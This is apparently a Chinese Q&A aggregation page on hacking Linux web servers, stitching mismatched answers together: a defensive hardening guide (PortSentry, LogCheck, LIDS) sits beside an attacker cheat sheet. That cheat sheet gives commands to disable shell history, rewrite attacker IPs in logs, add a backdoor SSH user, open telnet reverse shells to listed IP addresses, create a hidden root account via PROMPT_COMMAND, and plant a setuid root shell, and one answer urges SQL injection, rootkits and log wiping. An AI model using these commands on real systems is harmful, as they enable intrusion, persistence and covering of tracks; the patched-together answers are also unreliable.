本文目录一览:
- 1、linux入侵网站用什么版本系统可以?
- 2、linux 入侵?
- 3、linux 怎么入侵??
- 4、怎么使用kali linux入侵.asp网站
- 5、linux搭建的网站服务器怎么入侵
- 6、如何通过kali linux入侵网站
linux入侵网站用什么版本系统可以?
哪个版本都可以,只要有linux环境就可以了,可以运行一些入侵工具和shell脚本。
linux 入侵?
被用来抵抗来自Internet对主机的入侵。这些安全措施主要是:
防火墙,确定了系统的来自Internet的用户对哪些TCP或者UDP端口有访问的权限。例如
:我们通过一些很简单的Web Server防火墙的规则设置,就可以确定这台机器只有用来
提供http服务的80端口向用户开放。
系统是不需要没有用处的守护进程的。例如:一个Web服务器一般只需要一个正在运行的
进程来服务Web页面。进程并不是就是和服务与Web页面相关联的,譬如RPC/Portmap服务
,NFS服务,X Font服务,DNS域名服务,其他外来的或者是没有什么用处的应用软件应
该被关掉或者是禁用。在Red Hat Linux的系统中,通常我们用一种运行等级的编辑器来
进行有关的设置,譬如我们可以用ntsysv 或者tksysv来禁用其中的那些没有要求的守护
进程。
通过编辑和修改/etc/inetd.conf可以屏蔽一些不用的端口。作为一个典型的默认值,我
们安装一个新的Linux系统的时候,/etc/inetd.conf默认的打开了很多端口。所有的系
统都应该通过编辑/etc/inetd.conf,删除或者是注释掉其中的一些行,用来禁用那些没
有用处的端口,这是最基本的系统安全行为。
警戒线(Lines of Defense):
图解一、多层系统安全
这一部分,我们将讨论一个多层通道的系统安全问题。当其中一些安全层被破坏的时候
,很多安全层能够独立的应用来提供一些额外的防卫。图1就是一种多层结构的系统安全
模型。
图表中的每一层都会为自己的上一层提供额外的数据保护。例如:第一层是防火墙,如
果防火墙没有阻挡住外界的入侵尝试,那么第二层-端口守护程序就会提供额外的保护。
进一步,里面的安全系统是LIDS和LogCheck程序,在入侵尝试没有被第二层截获的时候
也会进行保护。
监控当前连接
防火墙后的第一防护层是用来监控当前与主机的连接尝试的软件包。端口守护程序包(
)提供了一些简洁和有用方式来完成这些
事情。
端口守护(PortSentry)程序的作用
端口守护程序的主要作用监控一些特殊的TCP/IP端口的活动情况。PortSentry监视并报
告一些端口的活动,其中的一种情况可能被选中,包括拒绝进一步的连接尝试。这是一
种很重要的防护措施,因为一般的黑客在入侵一个系统之前都会将会使用一些工具来探
测系统的漏洞和弱点。察觉到探测器或者是端口扫描,就可以彻底的切断一些潜在地黑
客进一步的连接尝试,中止一些带有入侵意图的进一步的端口扫描。
安装PortSentry
对于Red Hat的用户来说,Red Hat的ftp服务器上的RPM包里面包含了这个程序。这个站
点在全球都有它的镜像,你可以在上面查找距离你最近的站点。我还不
能确定.deb格式的软件包中间是PortSentry这样的程序,但是我可以确认那里肯定是有
这个软件的。对于其他Linux用户来说,通过原码来安装这个软件也是相当地简单的。
推荐配置
PortSentry有很多运行模式,包括不同的UDP和TCP秘密运行的模式。我选择的运行机制
是把PortSentry绑定在那些没有被使用的或者是认为有潜在的入侵可能的TCP端口上。例
如:我将24小时连续的扫描我的web服务器上面的这些端口,port 143 (imap2), port
以通过这条命令:
portsentry -tcp
在你的系统启动的时候就使PortSentry进入基本的TCP运行模式。同时要保证PortSentr
y的配置文件portsentry.conf中包含了TCP_PORTS这行配置来扫描你需要进行扫描的端口
。
反应选项
你能通过portsentry.conf中的"quot;Response Options"quot;部分来详细的说明什么样的反应是P
ortSentry察觉了一些不期望的连接。通常我会使用ipchains来中断那些来自于连接的源
方的进一步连接。这个也可以通过portsentry.conf中下面这样一行来进行配置:
KILL_ROUTE="quot;/sbin/ipchains -I input -s $TARGET$ -j DENY -l"quot;
在接受来自高端口的扫描行为的时候,可以通过删除上面一行中的-l这个选项来屏蔽这
些进一步的连接,可以有效的维持系统日志空间。
监视系统日志
诸如防火墙系统、PortSentry这样的软件可以有效的监视或者是屏蔽一些端口的不期望
的连接。这样可以防止最典型的那种"quot;扫描-入侵"quot;的攻击方式。
当系统需要运行特殊的服务(例如:Apache Web Server,或者是绑定了一个DNS服务)
的时候,同时有黑客破解了这种服务中的一些攻击点,这些程序就会很不幸运的不能保
持把所有的入侵者拒之门外。绑定运行着一个容易受攻击的程序的DNS服务器,这些端口
最终总是要被一些黑客通过扫描很广范围的机器的特定的一个端口,并且会试图通过这
个端口来入侵系统。很不幸,防火墙或者是PortSentry程序会将这些入侵尝试当作正常
的合理的连接。
系统日志检测(LogCheck)
LogCheck是用来扫描系统日志文件的软件(
/ )。LogCheck会扫描系统日志文件(在Linux系统中,系统日志文件在/var/log/目录下
面),同时当系统出现一些异常的时候,LogCheck就会通过Email来通报给管理员。系统
日志文件中的异常的消息通常是表示有一些黑客正在尝试入侵或者是正在侵入系统。
安装LogCheck
LogCheck有四个主要的配置文件。在RPM版本中,这几个配置文件在/etc/logcheck目录
下面。通常我们只需要配置logcheck.ignore和logcheck.violations.ignore这两个文件
。我在安装完LogCheck后的程序一般是这样的:
允许LogCheck在正常的运行模式下面运行一次,这样将会一个巨大的输出文件,不过我
们可以把这个文件删除算了。
些新的东西,同时也是一个很大的但是仍然可以计算大小的文件。仔细的阅读这个文件
。
在文件的入口处有一些不需要我们关心的特定的字符串,如果这些字符串时一些"quot;违反安
全"quot;的片断,我们可以将这些字符串片断加入到logcheck.violations.ignore文件中;或
者当他们是"quot;异常系统事件"quot;的时候,我们就将这些字符串加到logcheck.ignore中。
在折椅歌星期中,每隔12~24小时就重复一下这些步骤。在这个阶段中,我们反复的设置
.ignore文件的过滤规则,最后剩下的就是我们的系统真正关心的了。
注意到RPM文件指定LogCheck每小时运行一次,但是我只需要每天运行一次,除非是在特
定的需要监视的系统。这样可以每天把/etc/cron.hourly/logcheck这个文件拷贝到/et
c/cron中一次。
基于内核的入侵检测
基于内核的入侵检测是一种相当巧妙的新型的Linux入侵检测系统。现在最主要的基于内
核的入侵检测系统叫做LIDS,并可以从 下载。
什么是LIDS?
LIDS是一种基于Linux内核的入侵检测和预防系统。
LIDS的保护目的是防止超级用户root的篡改系统重要部分的。LIDS主要的特点是提高系
统的安全性,防止直接的端口连接或者是存储器连接,防止原始磁碟的使用,同时还要
保护系统日志文件。LIDS当然也会适当制止一些特定的系统操作,譬如:安装sniffer、
修改防火墙的配置文件。
LIDS文档工程
LIDS比安装PortSentry和LogCheck要复杂一点,但是很幸运的是,在LIDS的主页上面有
详细的安装和配置手册。
安装LIDS
首先,在安装之前,我们需要大部分最新的LIDS软件包(我使用的是0.9)和适当的内核
版本。我现在使用的是从Red Hat主页上下载的2.2.14-12版本的内核,因为其中包含一
些安全补丁。同时你也需要你使用的内核的一些源代码。
现在的LIDS主要是适用于2.2.14版本的内核。我安装的在2.2.14的内核的Red Hat Linu
x6.2上面安装了LIDS。在安装LIDS之前,我在下载了最新的内核版本,
并且依照
de.html 安装了这个内核。
接着的事情就是升级内核源代码。这里我们是这样做的:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
然后就是编译和安装lidsadm这个程序:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
生成一个RipeMD-160口令,这个以后将会在安装进内核的:
lidsadm -P
输入口令是"quot;anypass"quot;,得到秘钥"quot;d502d92bfead11d1ef17887c9db07a78108859e8"quot;。
接着,我把Redhat的配置文件拷贝到我的结构体系中,在/usr/src/linux目录下面:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
下面我们就使用下面的命令来安装LIDS:
cd /usr/src
patch -p0 同时我们应该注意到Red Hat所提供的内核和Linus发布的标准的2.2.14版本的内核有一
些细微的差别,因为其中包含一些修改过的驱动程序。同样lids-0.9-2.2.14-redhat.p
atch文件也是和LIDS发布的标准的lids-0.9-2.2.14.patch有一些细微的差别,不过可能
后者并不是特别适合于Red Hat系统。
linux 怎么入侵??
1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪恶用法
邪恶的替换到登录的IP和日志里的访问IP
sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security
邪恶的添加ssh限制登录的用户
sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh-192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
3.通过webshell反弹shell回来之后获取真正的ttyshell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
另外一种获取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通过TELNET进行反向连接:
telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面运行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unalias ls
7.linux的BASH提权
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo /dev/null echo kkoo:123456 /usr/sbin/chpasswd /dev/null unset PROMPT_COMMAND”
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个操作
怎么使用kali linux入侵.asp网站
kali我一般都用ssh的
1、修改sshd_config文件,命令为:vi
/etc/ssh/sshd_config
2、将#passwordauthentication
no的注释去掉,并且将no修改为yes
//我的kali中默认是yes
3、将#permitrootlogin
yes的注释去掉
//我的kali中默认去掉了注释
4、启动ssh服务,命令为:/etc/init.d/ssh
start
//
或者service
ssh
start
5、验证ssh服务状态,命令为:/etc/init.d/ssh
status
linux搭建的网站服务器怎么入侵
整站程序是php的话就利用SQL注入(一般都是linux环境下带个小php),进后台然后提权。和windows主机不一样。linux提权要利用内核漏洞什么的。然后就是留下rootkit,然后就可以走人了
千万记得,linux主机和windows主机不一样。日志要搞干净。尤其是用户执行过的命令也要搞干净
如何通过kali linux入侵网站
入侵检测系统的核心价值在于通过对全网信息的分析,了解信息系统的安全状况,进而指导信息系统安全建设目标以及安全策略的确立和调整,而入侵防御系统的核心价值在于安全策略的实施—对黑客行为的阻击;入侵检测系统需要部署在网络内部,监控范围可以覆盖整个子网,包括来自外部的数据以及内部终端之间传输的数据,入侵防御系统则必须部署在网络边界,抵御来自外部的入侵,对内部攻击行为无能为力。